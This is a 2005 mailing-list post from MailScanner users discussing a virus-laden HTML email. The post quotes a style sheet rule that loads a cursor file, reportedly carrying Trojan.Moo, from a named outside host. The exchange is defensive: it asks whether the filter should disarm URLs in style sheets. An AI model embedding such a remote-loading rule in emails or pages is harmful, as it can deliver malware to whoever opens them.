Virus in HTML Email Style Sheet

John Wilcock john at TRADOC.FR
Tue Mar 29 15:55:39 IST 2005


    [ The following text is in the "ISO-8859-1" character set. ]
    [ Your display is set for the "US-ASCII" character set.  ]
    [ Some characters may be displayed incorrectly. ]

Derek Winkler wrote:
> <style>* {CURSOR: url("http://banukultepe.sitemynet.com/m89.ani")}</style>* {CURSOR: url("http://banukultepe.sitemynet.com/m89.ani")}
>
> When the CURSOR is retrieved it has Trojan.Moo in it according to NAV.
>
> MailScanner did not catch this.
>
> Should there be a disarm URLs in style sheets setting in MailScanner?

I can't see how this could actually result in an infection, unless the
e-mail client has a bug that results in code being executed instead of a
cursor being displayed. If there are any common clients out there with
known vulnerabilities, it would indeed seem logical for Julian to do
something about this, similar to the IFRAME disarming.

Conversely, are there any legitimate uses for this sort of thing?

John.

--
-- Over 2500 webcams from ski resorts around the world - www.snoweye.com
-- Translate your technical documents and web pages    - www.tradoc.fr

------------------------ MailScanner list ------------------------
To unsubscribe, email jiscmail at jiscmail.ac.uk with the words:
'leave mailscanner' in the body of the email.
Before posting, read the MAQ (http://www.mailscanner.biz/maq/) and
the archives (http://www.jiscmail.ac.uk/lists/mailscanner.html).

Support MailScanner development - buy the book off the website!




More information about the MailScanner mailing list